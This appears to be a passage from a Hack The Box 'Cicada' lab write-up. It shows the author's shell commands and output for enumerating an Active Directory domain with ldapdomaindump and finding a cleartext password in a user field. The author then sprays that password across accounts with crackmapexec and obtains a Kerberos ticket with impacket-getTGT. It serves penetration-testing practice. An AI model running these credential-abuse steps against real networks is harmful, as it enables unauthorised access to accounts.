LDAPDomainDump
Using the valid domain credential, I can use ldapdomaindump to get a overview of the target domain
┌──(kali㉿kali)-[~/…/htb/labs/cicada/ldapdomaindump]
└─$ ldapdomaindump ldap://$IP:389 -u 'CICADA.HTB\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -n $IP --no-json --no-grep
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finishedcompleted
Computers
Groups
Those 2 groups are the only none default groups
Users
There is a CLEARTEXT password disclosure for the david.orelious user; aRt$Lp#7t*VQ!3
Validation
┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ crackmapexec smb $IP -u users.txt -p 'aRt$Lp#7t*VQ!3' --continue-on-success
SMB 10.129.41.192 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.41.192 445 CICADA-DC [-] cicada.htb\administrator:aRt$Lp#7t*VQ!3 STATUS_LOGON_FAILURE
SMB 10.129.41.192 445 CICADA-DC [-] cicada.htb\guest:aRt$Lp#7t*VQ!3 STATUS_LOGON_FAILURE
SMB 10.129.41.192 445 CICADA-DC [-] cicada.htb\cicada-dc$:aRt$Lp#7t*VQ!3 STATUS_LOGON_FAILURE
SMB 10.129.41.192 445 CICADA-DC [-] cicada.htb\john.smoulder:aRt$Lp#7t*VQ!3 STATUS_LOGON_FAILURE
SMB 10.129.41.192 445 CICADA-DC [-] cicada.htb\sarah.dantelia:aRt$Lp#7t*VQ!3 STATUS_LOGON_FAILURE
SMB 10.129.41.192 445 CICADA-DC [-] cicada.htb\michael.wrightson:aRt$Lp#7t*VQ!3 STATUS_LOGON_FAILURE
SMB 10.129.41.192 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.129.41.192 445 CICADA-DC [-] cicada.htb\emily.oscars:aRt$Lp#7t*VQ!3 STATUS_LOGON_FAILURE Valid
┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ impacket-getTGT 'CICADA.HTB/david.orelious@cicada-dc.cicada.htb' -dc-ip $IP
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password: aRt$Lp#7t*VQ!3
[*] Saving ticket in david.orelious@cicada-dc.cicada.htb.ccacheTGT generated for the david.orelious user